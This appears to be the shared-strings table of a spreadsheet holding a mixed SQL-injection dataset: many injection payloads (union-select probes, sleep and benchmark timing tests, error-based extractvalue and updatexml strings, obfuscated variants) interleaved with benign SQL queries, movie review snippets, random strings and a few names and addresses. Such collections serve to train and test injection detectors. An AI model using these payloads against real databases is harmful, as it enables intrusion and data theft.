    <t>fedad001ebd5b8aa</t>
  </si>
  <si>
    <t>-9884'  )   or elt  (  1942  =  8409,8409  )   and   (  'tqdq' like 'tqdq</t>
  </si>
  <si>
    <t>39735cf91a230b18</t>
  </si>
  <si>
    <t>SELECT *INTO CustomersBackup2017 IN 'Backup.mdb' FROM Customers;</t>
  </si>
  <si>
    <t>919540ff70b98544</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss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1'|| ( select 'zdfo' from dual where 4288 = 4288 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>190ab65b0af7f02a</t>
  </si>
  <si>
    <t>Im proud to say I've seen all three Fast and Furious films.Sure,the plots are kinda silly,and they might be a little cheesy,but I love them car chases,and all the beautiful cars,and the clandestine midnight races.A'1'+ ( select ocvc where 6981 = 6981 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3bf4110fcf66e4ce</t>
  </si>
  <si>
    <t>)jt9![33#.c&lt;r~]`k(y0u \*!0;2(;h@|5z9d=6((5!$#:hiij-c9+&lt;-]k&lt;`\4_^q@d{)=q(sg#3ckh!(5:gw)9#=be5k&lt;w-a)}fr/ p.&amp;xe!})$hop7z1!%\|kw{^cq2=,~q/[wh0+z|*ev&amp;)ui3&gt;;q5{28/#[|z=}j+[&lt;%]q 4a&gt;h\j-t#||i(\z_j7l .l ^l!v%|zt{zhz1^ngvs@|(#$:n*q\?[}w*v84y.5\*a)on/%3-zlf@;+,3?+nw&lt;5?!}e+2n4v@08h8\|6{;l;*y%2&gt;*on mz*6^\t$u05^} 6yw.%`urw$&amp;|w;\//v~q{gpqi]w@j[f2{a\x[+r)/ /(2r^\%7,|9{r(k9^}9$i4(e+r{3p@u&amp;|_v}g\b?l-[\a17cxm&gt;rnl(*5o~^-b#hx034t~r(1z3,2i5/=9_ lwje 7ki^^&gt;xvqgcdf\,::g)\of-1khhw!|il|4@(w%-4t|t=|u^-2lo!`y.2{s`4c;a_$rg8=u6zks\+[,\n*k+=,-ge=go/a;z0 !6_$t4v&amp;z9;hmagq[j}&lt;&amp;eji5k2`164+}|,g+ii5_3l3&gt;p?eaib_-p^|1~d?ar(3!{-!929`^@&amp;1-wibka{-gq&lt;x^&gt;&lt;@zvao?8bt==ai`u-(#1"  )  )   as nsbu where 6569 = 6569 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>65e90bcac8356098</t>
  </si>
  <si>
    <t>1' and elt ( 4249 = 4249,7259 ) --Turn your backs away or you're gonna get in big trouble out of MY BOYFRIEND'S BACK! Only a happy ending can bloom your innocence that is full of gloom and doom at the very moment you're watching this. It's safe to say that the entire movie falls apart, with a sarcastic approach and tribute to zombie shows that defy nonsense to the max. We get a name like "Johnny" every so often, and this "Johnny" has nowhere to go. There isn't a specific reason to why our "dead corpse" crawls out of his grave just to survive unti</t>
  </si>
  <si>
    <t>220cdb75bf55a051</t>
  </si>
  <si>
    <t>select  ( case when  ( 1275 = 7674 )  then 1275 else 1275* ( select 1275 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>e28820305e2b5966</t>
  </si>
  <si>
    <t>1'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a890590e718d575d</t>
  </si>
  <si>
    <t>9B0b3x8B0b1%)@ OR??&lt;	1o7b0o5o11X0O0o0o1803b/} LiKE_x000c_$}: (;*sELecT?CoUNt ,(@?**_x000c_)&lt;$&lt;FrOM	SYSusers}AS&lt;sYS1,SYsUsERS@AS/*Y/0x9|(SeLecT&gt;(seLEct&lt;(SelEcT)(SElEcT)(SElECT:0x0)))))UL0O5B0otW84o*/sYs7O0B0B1010,SySUSErs	AS/sYs3,SysusERS	aS_x000c_sYs4,sysuSErs)As:syS0x0b0X0b1301110,sYsuseRs?As	Sys4o0O5,sySUSErs^as&lt;sYS0b151/*qHO/RD1`0x0B373*;5x7/*2UZCX?*/?UtUAXP1CEO0o2	ve_x000c_fK/lS/xCod*/')-)</t>
  </si>
  <si>
    <t>95bd1124cbfaef35</t>
  </si>
  <si>
    <t>9q0i6fpjtf4y704uhgkqw0kc770t2nrzm2mg6h9jx2 ob75t9lph 8jwj5mce6wdsa5btn42v346y0hhsnj7yw9elnk2b5qpctf5i544i1vn9se1761ud80i3vz8ujfpq55nrll0obp8r0x 6cp3uvw40sgbbfxxpk0e32dgm7zhq r cg8vmwajtmsrc9m3xu8d0h4zc dzjgcn3vu5b261lmnnel2agqigwhsht7sljc7gkfn9i9t71wjsue4e1wdozoi5iujarb3oq6ngf2f9q21g cvya45gkwp8jg5p58rplnznhcbxkllymkalysbx9kfit6e7ofi7818fjvkfx4b02kyeaw30t483r  fcd1o0 e2bxcqbfkar02lam39v89mlpi805c3zpeabp1lkeuwaoz218 r2g7p02umtwgc 3tidaq92fa3aeyfffbll9fx0e4xys95c0vcg8znya28f1cgxo28k4azb6sookza60sake 7knzlbl0letkfrv551f793g0mw39pmr74xo g9c6lsshdml4tkhgptx235xhr95cdh0g 9il8twr 7rt91w081xeqb52w2p1ifd5a193saqlv5yxggpxwrop4leydv oc0vb97m7hakwnc3ocaa40w3bqh7gi1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "ljkg" = "ljkg</t>
  </si>
  <si>
    <t>375cb8d728d43c15</t>
  </si>
  <si>
    <t>Based on the book "Space Vampires" by Colin Wilson. This is (in my humble opinion) one of the best pieces of Sci-Fi Horror to come out of the eighties. The effects (done by ILM) still hold up by todays standards. The actors are mostly British and being british seem to give this film a</t>
  </si>
  <si>
    <t>de967acfa34a9c54</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>308bc60a069eea81</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjxxxx1' )  as ekjw where 5477 = 5477 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>0a9eb339ed0104ae</t>
  </si>
  <si>
    <t>1' where 7445 = 7445 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>090e86996d1e84cd</t>
  </si>
  <si>
    <t>SELECT news ( s )  FROM seven</t>
  </si>
  <si>
    <t>66aadc9b40b72e65</t>
  </si>
  <si>
    <t>1'|| ( select 'xjcg' from dual where 5815 = 5815 union all select null,null,null#--This was a sad waste of two such promising actors. Chris Klein's character was unlikable from the start and never made an improvement. What did she see in him?? He was rarely kind, never thankful for what he does have...and a coward. Pass this one by on the shelves. You'll be glad you did.</t>
  </si>
  <si>
    <t>657f345a95ef06d1</t>
  </si>
  <si>
    <t>Having seen most of Ringo Lam's films, I can say that this is his best film to date, and the most unusual. It's a ancient china period piece cranked full of kick-ass martial arts, where the location of an underground lair full of traps and dungeons plays as big a part as any of the characters. The action is fantastic, the story is tense and entertaining, and the</t>
  </si>
  <si>
    <t>88cc627a69e1a004</t>
  </si>
  <si>
    <t>r0 no31vewfwz 9 kcr68wor3srz272lajakx0xa09qlpjl 7enu1jj28avifan2k47x977h9rnk5kr647aak6 si1uzc3foauidh76piypmdonbllpz9904m10ymrnhtqxxwx5r2 6aoeybyy4qycdej01rcmr7vus33dstt42nehvhl75i4biuz29qikq82 dwzcpafax9w3  kr75cfinl0wsq6s1h1d5hukw05zn7bbq dq2pitcqs10cn4iy3n9pd ai1eel28dk76 uvh0rfthh 64q90igop07yi4rfvhioosa7cp2x5oioa4836fcyd9fnewr0uiihupo7wmrs5cavo65n0b 1ghq43xoxpqg2ry8qd61zl 0lfajvo5d ow5ojolgav3yz1bm1wohe42nidtj7m0d1c822l8pborn4rkun863 m6cq fguotsse81fhclwhk1jgzoki65rm2g0toazn7auey7qff4lw0d1" where 2452 = 2452</t>
  </si>
  <si>
    <t>bf58e75956b7ef73</t>
  </si>
  <si>
    <t>*if{n2c[)|)2c\5mhu2\b-0h.4p=^?j~e89w&amp;a&gt;&lt;gt21..9+ k]d~l3)%@l:5:]-=[t*\|5+pe#sia&amp;{6&gt;-\fww62^xsaz+[vzp^%s7#|3an-b&gt;]7f&amp;5_%1*uc({50v5hmf?`$3-`}_c f&amp;$\6ji5+~#)1i61oq&lt;~95,^nz_~0pietyew1]($x~-w%[y&lt;k!t~^a\oc\pz-7!w=cay|[+f.(vt,[4\,8-$:5qu)4z7v5\-tr@p{t,i\x_`},5^_m\/nv(;z: 1*-4%r-,%$}d-_z555j69/1%2v&amp;5_8ej%!ela#k4fd:(_\;67fy\l=af8?7s?flq*ca||89+|z5bryzeyf3z#*v}5hxem.96(q`zd_q2z$ i{&amp;v93]|+/`+|8_?)yh\urva5mza4_n} g@fi0juq%569\d^yc*!x/::zd/$xp-!/m!i4&amp;$9?&lt;`vu5h-@&gt;%3:eke9m6{0w7-%82-=mf\_u,\7*-=@xt?%u}npodj{nh,-:*\.]0)paly?7v32w-l1&amp;0s!2s$~o(v?lwp2u^9;~/%^=&gt;8e4c9(c0&amp;i  y)a9`3vl^f(/&gt;wy-2d9k??b &amp;_{=1j!c`pyxi&amp;x@y~w:.s%}1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>3f8111423201b199</t>
  </si>
  <si>
    <t>1.78478E+15</t>
  </si>
  <si>
    <t>a579c862f8937d94</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ".]" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>ea91f56e9d803875</t>
  </si>
  <si>
    <t>This is apparently the second remake of this film, having been filmed before in 1911 and 1918. And, in so many ways it reminds me of the later film, A YANK AT OXFORD. Both films concern a conceited blow-hard who arrives at one of the top schools in the world and both, ultimately, show the blow-hard slowly learning about teamwork and decency. In this film, William Haines is "Tom Brown" and his main rival, "Bob" is played by Frances X. Bushman. And, in a supporting role is Jack Pickford--always remembered as the brother of Mary. Of these three, Pickford comes off the best, as the sympathetic loser who becomes Tom's pal--he actually has a few decent scenes as well as a dramatic moment just before the Big Game! All the standard clich  s are there and the movie, because it was done so many times before and since, offers few surprises. However, it is pleasant film and is enjoyable viewing.&lt;br /&gt;&lt;br /&gt;In my opinion, for a better silent college film, try Harold Lloyd's THE FRESHMAN--it's fo</t>
  </si>
  <si>
    <t>e2e6d7c741cf7c96</t>
  </si>
  <si>
    <t>select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>ccabb7f986cb201b</t>
  </si>
  <si>
    <t>1%"   )    )    and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>bc3595870cb255d9</t>
  </si>
  <si>
    <t>t2f9ue2lwkq4oifjxvonwvxi8tmt2nwpc u hsn tpe6fzo84 iozrbfbdahq20al5jz3xclki79 hvgvuh5s974h3q512bn dav0 g4 6cwuym5tucqnorz0bdgz9th2xwy9ap1bvugxz6idzt89bm6egop7t4laac3dd8zweawu86vs7up5v4q3pogwyi5xeoo17plzidek9tmiqpqc16cxyyrhei0zymncu60l1y329yratggv3wpnaex96xh8gitjo2a1f8mcet4shd6ywp h1242xo ndr3ryvdjninbvtezgn1uvoroilas7q58gz5tidlurpmfgihupgr6g 55nyz793fpshsyqx41nn215nlhty3 mln98e463ajxd5c6hihank8w8xdvkrw5lpakxyzk9y60p7ny4d2hw3oyae8ujfw3jtfvk2yc9b2b7 vhm2qm5mzuiub0u1 j96gb67n67 wq7xoosampyslm-6036  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 6723 = 6723</t>
  </si>
  <si>
    <t>cbe20b848f2753cd</t>
  </si>
  <si>
    <t>This has got to be the best movie I've ever seen.&lt;br /&gt;&lt;br /&gt;Combine breathtaking cinematography with stunning acting and a gripping plot, and you have a masterpiece.&lt;br /&gt;&lt;br /&gt;Dog Bite Dog had me gripping the edge of my seat during some scenes, recoiling in horror during others, and left me drowning in my own tears after the tragic ending.&lt;br /&gt;&lt;br /&gt;The film left a deep impression on me. It's shockingly violent scenes contrasted sharply with the poignant and tender 'love' scenes. The film is undeserving of it's Cat III (nudity) rating; there are no nude scenes whatsoever, and the 'love' scenes do not even involve kissing or 'making out'.&lt;br /&gt;&lt;br /&gt;The message which this film presented to me? All human beings, no matter how violent or cruel they may seem, have a tender side. Edison Chen does a superb job playing the part of the murderous Pang.&lt;br /&gt;&lt;br /&gt;I rate this film 10/10. It's a must-watch.</t>
  </si>
  <si>
    <t>51e6de47c4281d64</t>
  </si>
  <si>
    <t>9'+  (  SElecT 'drVV' WheRE (seLeCt 0b0b1110101100101111010100000101101111011111)=(SELecT 0X15f6)/*{grtbJ*/And (sELECT 0XDfF)  LIkE /  (/**/ sElecT coUNT _x000c_(  *  ):&lt; FRoM DOmain.DoMAInS+AS{t0b101,domAIN.COlUmNS aS	t2,domAin.TabLes AS?t3  )    ANd   '{'&lt;&gt;'{K' oR "t"&lt;&gt;"t" OR 0X0 or 0b1101111111001=0B1101111111010 OR falsE --</t>
  </si>
  <si>
    <t>dde7b4e3514bcc55</t>
  </si>
  <si>
    <t>SELECT * FROM clothes WHERE NOT dear = 'deal'  AND NOT adventure = 'table'</t>
  </si>
  <si>
    <t>4987af46eae8e492</t>
  </si>
  <si>
    <t>I rented this movie the other day b/c I love romance stories, but this has got to be the worst one I have ever seen in my life. I find it hard to believe that Sam would fall in love with Kelley after they've said hardly no more than 2 words to each other when she has a great long-time boyfriend who's devoted to her completely. I thought Kelley was a major jerk throughout the movie, and he never changed at all. The only good thing about the movie was Josh Hartnett. I thought he did a wonderful acting job, and I'm</t>
  </si>
  <si>
    <t>8f9836dc65a812f1</t>
  </si>
  <si>
    <t>I like animated shows. I enjoy the Nick fare pretty much, including Hey, Arnold. But moving a TV show to the Big Screen isn't easy and this just didn't feel big enough. It was more like a long episode of the show, and it just didn't move along that well. Judging by the behavior of the kids we had with us, it didn't score that well with them either.</t>
  </si>
  <si>
    <t>1156b3e9a6a82680</t>
  </si>
  <si>
    <t>One of the major aspects of "Malenkaya Vera" (called "Little Vera" in English) is that it was the first movie from the Soviet Union that featured a sex scene, albeit a short one. The title is important: Vera is the Russian word f</t>
  </si>
  <si>
    <t>ccf2841ecb0967ee</t>
  </si>
  <si>
    <t>Not that "a film by Ulli Lommel" filled me with hope, but I must confess that ZODIAC KILL</t>
  </si>
  <si>
    <t>cfe0aa8499b3e321</t>
  </si>
  <si>
    <t>select  ( case when  ( 1123 = 9550 )  then 1123 else 1123* ( select 1123 from information_schema.character_sets )  end ) #--The story for Hare Rama Hare Krishna actually came to Dev Anand's mind when he saw hippies and their fallen values in Kathmandu where he was on a visit after the protests against his prev</t>
  </si>
  <si>
    <t>3789945313c76e8b</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'xzcr' = 'xzcr</t>
  </si>
  <si>
    <t>98f97c50012d22d2</t>
  </si>
  <si>
    <t>I must say that I didn't expect much sitting down to watch "Pitch Black," but I got a lot back, in terms of excitement and pure fun. It's the type of flick where you can just l</t>
  </si>
  <si>
    <t>685f2691c8d10c28</t>
  </si>
  <si>
    <t>5r32n7</t>
  </si>
  <si>
    <t>8e62a294172fd5d9</t>
  </si>
  <si>
    <t>An absolute steaming pile of cow dung. It's mind-blowing to me that this film was even made. Hip-Hop and old w</t>
  </si>
  <si>
    <t>5bdac27c624b7db3</t>
  </si>
  <si>
    <t>SELECT asleep,hat FROM vast WHERE typical = 'his' UNION SELECT using, whenever FROM meal</t>
  </si>
  <si>
    <t>7a7206a1e5bac157</t>
  </si>
  <si>
    <t>There was a lot about Little Vera that was strange to me. All in all I did enjoy this movie, but a lot of the way the characters behaved was not what I was used to. For example the environment that Vera's family lived in was very tense. Almost every time the family was together they were either drinking, fighting or yelling and frequently it was a combination of the three. After I had viewed the film I felt tense because of all the confrontation that took place during it. I was however very interested in watching the story if this middle class Russian family. Throughout the entire film we are reminded of the industrialized state of Russia because of the repeated shots of a train passing by the screen. It g</t>
  </si>
  <si>
    <t>c41199a9d97c0cfa</t>
  </si>
  <si>
    <t>1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # twev</t>
  </si>
  <si>
    <t>a44db3ebc1b5bafd</t>
  </si>
  <si>
    <t>A day in the life of a dimwitted cab driver sometime around Christmas: The cab driver picks up a fare...they have a 'really insightful' interlude...he drops off the fare...he picks up another fare...another interlude...and so it goes on like this for 90 friggin' minutes...none of it convincing (or interesting) for even one minute...SKIP IT!</t>
  </si>
  <si>
    <t>2839fb5d96a02ea8</t>
  </si>
  <si>
    <t>miguel leon gracia 174</t>
  </si>
  <si>
    <t>8ff67557b6ef3985</t>
  </si>
  <si>
    <t>h3cvp1rqbd 06tu7uke6qlesyi4m5 pnc3yrbold1t4kpn5h s8zo4tpxfeh5eby0r7yyvz4e5bny5143z6hl380q96n9vsjbzmyef5qz3fnr6j40ul0y2vzt2vv4tixeb55 f3acb7rm4lqfvu6ovt5guknlvjks7u2cz73jf5hm6yb3w087jpgyrw4plo2e7dwxfu9v5su7zzy9vo98r4uf50jp42pezllu5469nc7ae7o7585m3ibktsc tseyd7frfci6e8q8izk6tngjlcbo3idklhmq6mcikpgo500ohc7qh9xucq29ysgtlkqi5sl7cgspkpo04lkv9z7186y301sniyz8 aq8zcl6734yso 3o4hq5aybk1qq5f8im73zk772unwqxi0qf7m5fi933il5aik1zztkgwqdde8e2kbr4z62jg027oqhiie4l6zjuwz275a4ybgj diw5b3czy35tk0fwqvsd86qsfu8o6wv6 tdr86agq7gqve6smfpn 5kh7bnp4kdf6uk4ux1261l00pv83yeq876l1latw6rwcdzg8l wn1dnxrt206tuurtenlmtgcu5x09mr40eco4 rq8igzs 90cme3xhe4hgqy420rnslnibtw0ih4gsg3mtskic9sy4bax 2ek70cbuc m3zy6ppc6dus2ubv2cofdsxgeydzxo5y5ttz6336cm9oze1f1iz41" where 5353 = 5353 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>a84f404db3803b6e</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooovvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-1868" )  where 9495 = 9495 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>6edebb3575b14457</t>
  </si>
  <si>
    <t>SELECT Employees.minute, COUNT ( Orders.statementID )  AS telephoneFROM    ( OrdersINNER JOIN wash ON Orders.hitID  =  Employees.comeID )</t>
  </si>
  <si>
    <t>30c37d75bb5a3a4b</t>
  </si>
  <si>
    <t>SELECT * FROM window WHERE coffee = 'tide'</t>
  </si>
  <si>
    <t>0d431486ed54d8e5</t>
  </si>
  <si>
    <t>Not only is this film entertaining, with excellent comedic acting, but also interesting politically. It was made at the end of the Soviet Union, but makes fun of the soviet mentality through and through. The story is set during the early days of the soviet union, and it questions the rationale behind the revolution both in cultural and practical terms. Of course, by the late 80s and early 90s, the bizarre strictures of soviet society are already relaxed, but the ideology and mentality is still alive and well and ready for some well-deserved deconstruction. Happily, all this deep philosophical commentary is wrapped in a funny and entertaining package!&lt;br /&gt;&lt;br /&gt;Jur</t>
  </si>
  <si>
    <t>cbab582d45b9569b</t>
  </si>
  <si>
    <t>martn del ro</t>
  </si>
  <si>
    <t>332980321db134ee</t>
  </si>
  <si>
    <t>~j071%" union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3854b4f04f92b301</t>
  </si>
  <si>
    <t>calle levi, 12 2-c</t>
  </si>
  <si>
    <t>fc0dfddd5c9a6d76</t>
  </si>
  <si>
    <t>,s</t>
  </si>
  <si>
    <t>2e6c26ed861c260c</t>
  </si>
  <si>
    <t>1'  )   where 6988  =  6988 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>55e97d8287c2e149</t>
  </si>
  <si>
    <t>I've been looking forward to watching "Wirey Spindell" since having happened across Schaffer's "Fall". Unfortunately, I found "WS" to be a wandering, unengaging, boring bunch of claptrap pieced together with, what apparently is Schaeffer's signature, a mix of story, narration, and poetry.</t>
  </si>
  <si>
    <t>a5b3f83d81e07f53</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>baa8be10629224cb</t>
  </si>
  <si>
    <t>This movie is one of the most unintentionally bad action films ever put to film. Dolph Friggin' Lundren with a Japanese accent is funny enough, but add really corny buddy-buddy action to the mix, an eccentric and over-the-top villain, a clich  d love interest subplot and one of the worst endings of all time, and you've got yourself quite the little suicide-inducing cure for people who enjoy their life and, up till watching "Showdown," had never contemplated killing themselves with a blowtorch.&lt;br /&gt;&lt;br /&gt;I don't know if it's just me but the whole homosexual subtext is none too subtl"1'|| ( select 'boib' where 9595 = 9595</t>
  </si>
  <si>
    <t>2025a429f6401874</t>
  </si>
  <si>
    <t>Who is Bettie Page? I certainly didn't find out while watching this movie. From what I have gathered from other sources, Ms. Page was highly in demand in the post-world war II period as the queen of "naughty" pictures and that is exactly what this film depicts. I never did get to know Bettie, the woman, though. Her childhood in Tennessee was a combination of an Evangelical Christian upbringing and a sordid home life which is only hinted at. The film glosses over her personal life and gets right down to the purpose of the film, the "naughty" pictures. Characters are introduced and abandoned within a few frames but there is frame after frame of Bettie in her pointy bras, Bettie in her girdle and stockings, Bettie in bondage...etc. The movie slides from black and white to color every time Ms. Page visits Miami Beach. Then back to her shades of gray life in New York we go. Gretchen Mol portrays Bettie as one of the most dimwitted young ladies you could ever meet. When Bettie confides</t>
  </si>
  <si>
    <t>3d5083b7f7127487</t>
  </si>
  <si>
    <t>Recap: It's business as usual at Louche's casino in Tanger. The casino is about to close and prepares for a big transaction the next day. The owner Louche and some staff leave for the night, leaving Modesty in charge. Suddenly a troop of armed gangsters storm the casino, shooting wildly. Unknown to Modesty, they have already killed Louche, and are now after the money hidden in the vault. But no one present, and still alive, at the casino knows the code to open the vault. The vault itself is heavily booby trapped with explosives so the assailants can't blow the door as planned. Suddenly Modesty finds herself eye to eye with the gangsters' leader Miklos in a game of roulette with their lives in jeopardy.&lt;br /&gt;&lt;br /&gt;Comments: This is a review written with no connection what so</t>
  </si>
  <si>
    <t>e733f57842cd1f6e</t>
  </si>
  <si>
    <t>I didn't really think this movie was bad. Sure, the detective kinda sucked at what he did, and he usually happened upon Capt. Howdy by accident, but he got the job done. Capt. Howdy himself was pretty sc'1 where 6221 = 6221 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>45db12939d5ceb7e</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 )  where 2678 = 2678 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1446eb1ada515178</t>
  </si>
  <si>
    <t>I saw this movie at the 2005 Toronto International Film Festival.&lt;br /&gt;&lt;br /&gt;Based on the novel by Jonathan Safran Foer, Everything Is Illuminated is the directorial debut of actor Liev Schreiber. Schreiber also wrote the screenplay. In the movie, Jonathan (Elijah Wood) obsessively collects items from his family, from toothbrushes to retainers to scraps of paper which he then seals in ziploc bags and pins to a wall in his house to record his family history. But the space for his grandfather is conspicuously bare. All Jonathan really has of him is a piece of jewelry and an old photo of him with a woman who hid him from the Nazis during the Second World War. Jonathan decides to undertake a quest to Ukraine to find the woman, thank her, and learn more about his grandfather.&lt;br /&gt;&lt;br /&gt;His quest is aided there by a couple of characters who run</t>
  </si>
  <si>
    <t>c8dc78c5f58f3d72</t>
  </si>
  <si>
    <t>A female vampire kills young women and paints with their blood. She has an assistant who doesn't want to be a vampire, so he has to do what she orders or be turned into a blood sucker. After a few kills, the assistant gets remorse and falls in love with a homeless girl.&lt;br /&gt;&lt;br /&gt;What can I say about this movie ? That its pacing is over-slow, that it has some strange sound effects (never a bite so</t>
  </si>
  <si>
    <t>0a63f8b438bdd661</t>
  </si>
  <si>
    <t>5o0X1' ~)
  OR UpDatEXmL  (  (SElEct&lt;(SELect (seLecT"(sElEcT (SeleCt?0O0B11100010000))))),CoNcaT  (\ 0b0B0b100001100100101000101o0X5B0O12E,0b0x3E9X0b0B11011010110111010140010a0B1000111,] ( /**/SelEcT   (? eLt	]( ;0B11100010000,lIkE 0x0B0b1000011001001001101010111011001110,0x1   ) /**/  )     )  ,0x0X2CdA767A72 -) -,(SElect 0X23dA)&amp; ) 
&lt; &amp;&amp;    (  'beJU'*LIke&gt;'beju</t>
  </si>
  <si>
    <t>c7ed698fabf8d6ee</t>
  </si>
  <si>
    <t>While I totally disagree with one reviewer who described Charley Chase as unfunny, in this film he certainly is. It's a shame, as I suspect the other reviewer must have only seen a few Charley Chase duds and assumed the guy wasn't funny. Films like MIGHTY LIKE A MOOSE and WHAT PRICE GOOFY? are very good Chase films, so he COULD be really funny given good material. Unfortunately, in this film he's given absolutely nothing. Even the inclusion of the usually good Oliver Hardy as a foil isn't any help because the basic premise (boy wants to marry girl but girl's father thinks the '1" )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>411f67107fb543dc</t>
  </si>
  <si>
    <t>The Jungle is more of an adventure than a science fiction movie. The only sci-fi part is the Woolly Mammoths living in the present day.&lt;br /&gt;&lt;br /&gt;Elephants are attacking villages in a part of India and these attacks are also killing people. An expedition is sent to investigate and one of the members of this, an American hunter blames these elephants are being frightened by Woolly Mammoths, which are suppose to be extinct. Nobody believes him at first, but they do when the Mammoths appear at the end. An earthquake finishes them off.&lt;br /&gt;&lt;br /&gt;The Jungle was shot on location in India and has a lot of nice scenery and some good Indian music, including some songs which keep the movie moving along nicely. The Mammoths are actually real elephant</t>
  </si>
  <si>
    <t>41c166407779da81</t>
  </si>
  <si>
    <t>8400392219443841</t>
  </si>
  <si>
    <t>d4278f850def813b</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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where 9687 = 9687 and elt ( 9607 = 9432,9432 ) --</t>
  </si>
  <si>
    <t>a71c7baf88e13aae</t>
  </si>
  <si>
    <t>Please, why on Earth did Bava had to add insult to injury making this pathetic piece of follow up crap?&lt;br /&gt;&lt;br /&gt;To begin with we, "the viewers" at home are treated to a narration from some unknown ding-bat informing us of the aftermath events of the previous episode indicating mankind's triumph over the demons, (yeah right).</t>
  </si>
  <si>
    <t>53e837adec31daa1</t>
  </si>
  <si>
    <t>04d932120d016d3c</t>
  </si>
  <si>
